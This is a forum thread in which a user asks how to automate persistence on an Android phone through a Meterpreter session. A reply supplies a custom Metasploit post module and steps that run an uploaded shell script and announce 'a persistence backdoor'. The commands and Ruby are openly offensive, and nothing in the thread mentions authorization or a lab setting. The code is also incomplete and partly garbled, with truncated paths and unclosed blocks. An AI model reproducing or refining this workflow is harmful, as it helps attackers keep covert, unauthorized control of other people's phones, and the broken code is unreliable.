Forum Thread: How to Autorun Android Command Through Shell in Meterpreter?

I've been at this for days to no avail, I'm having issues with automating persistence within android on connection of a meterpreter session.

I've been playing around with the information at this link, quite successfully I might add. however, the issue arises when I try to drop in to a shell and run commands on that shell within android.

The target is to upload a .sh file on connection, drop to a shell and then execute this command. The automation gets as far as "shell 1 process created" then ends. It's driving me up the wall.

Here is what I have written in my command file;

cd /
cd /sdcard/download
upload /root/Desktop/AndroidAutorun/
cd /
cd /sdcard/Download

As I mentioned, it executes flawlessly until shell, then nothing happens.

I'm relatively new to linux commands and am learning as I go along, please forgive me if its unbelievably obvious. Does anybody have any idea what I'm missing?

Join the Next Reality AR Community

Get the latest in AR — delivered straight to your inbox.

2 Responses

I think i might have a solution to the problem
i created a post android module
touch postmodule.rb
copy it to the metasploit source directory
cp postmodule /usr/share/metasploit-framework/modules/post/android/manage/
now paste this code into the postmodule.rb file in the metasploit folder

class MetasploitModule < Msf::Post
include Msf::Post::Common

def initialize(info={})
super( update_info( info, {
'Name' => "script_runner",
'Description' => %q{
This module runs any .sh script on android using android shell
'License' => MSF_LICENSE,
'Author' => 'Anonymous' ,
'SessionTypes' => 'meterpreter',
'Platform' => 'android',

def run
print_status("Running persistence script")
cmd_exec("sh /sdcard/")

print_status("You now have a persistence backdoor")

notice in the code you need to name the file and upload to /sdcard before you run the post module

now when that is finish you:
backgroung the meterpreter session by running
run the post module by
use post/android/manage/postmodule.rb
set session <metasploit sessions>
to know your metasploit session type
finnally run the post module by typing

you could write the .rc file to automatically background the sessions and run the post module, i am suspecting that you already know this. I had this same problem and didnt know what to do then i wondered how does metasploit run post module. I checked out one of the post module script, having prior programming knowledge of python i was able to understand the ruby code, anyways what i understand is that in the common.rb file there is a class i cant remember but it has the cmd_exe method. Im not sure, but I think this method guess the kind of meterpreter sessions you have either android or windows and then i create a channel of some sort not sure maybe someone could explain. Anyways with this, you could run any non root comamand. this was very simple but the point is you just have to read and understand. I think i will do some forther researching to add rooted command. I think there is another file or class called :priv which will do this im not sure.

OH BTW i created this account with temp mail so i dont know if this post will last lol

Share Your Thoughts

  • Hot
  • Active